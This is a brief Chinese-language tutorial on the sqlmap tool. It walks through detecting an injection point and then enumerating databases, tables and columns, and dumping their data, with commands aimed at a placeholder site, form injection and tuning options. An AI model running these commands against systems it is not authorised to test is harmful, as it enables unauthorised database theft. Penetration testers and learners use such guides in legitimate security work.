简介
SqlMap是一个基于Python的工具。
Python下载官网地址:https://www.python.org/downloads/
Sqlmap注入的一般流程
一、判断是否存在注入点
二、查询数据库信息
三、根据数据库爆破数据表
四、根据数据库名和数据表名爆破字段名
五、爆破字段里面的数据
Sqlmap注入的命令参数
1、判断注入点:sqlmap.py -u url(目标地址)
- -u:指定地址
2、爆破数据库名:sqlmap.py -u http://xxx.com/?id=1 --dbs
- –dbs:查看所有数据库名
- –current-db:查看当前使用的数据库
3、爆破数据表名:sqlmap.py -u http://xxx.com/?id=1 –D 库名 –-tables
- -D:指定数据库名
- –tables:查看指定库下面的所有的表名
4、爆破字段名sqlmap.py -u http://xxx.com/?id=1 -D 库名 –T 表名 –-columns
- -T:指定表名
- –columns:查看指定库的表中的所有字段名
5、爆破所有数据 sqlmap.py -u http://xxx.com/?id=1 -D 库名 –T 表名 -C 字段名 –-dump
- -C:指定字段名
- –dump:根据指定的库、表、字段爆破里面的数据
其他网页命令参数
Sqlmap对伪静态进行注入sqlmap.py -u http://xxx.com/abc/1*.html –-dbs
(* 表示指定注入点)
Sqlmap对登陆框(表单)进行注入sqlmap.py -u http://xxx.com/admin/index.php --form
其他命令选项:
--batch
:自动选择
--flush-session
:清除缓存 //简写 –z flu
--level
:共有五个等级,默认为1,等级越高,测试的内容也越多
--risk
:共有四个风险等级,默认是1,等级越高,用来测试的语句也更多
-v
:显示详细扫描信息,共有5个等级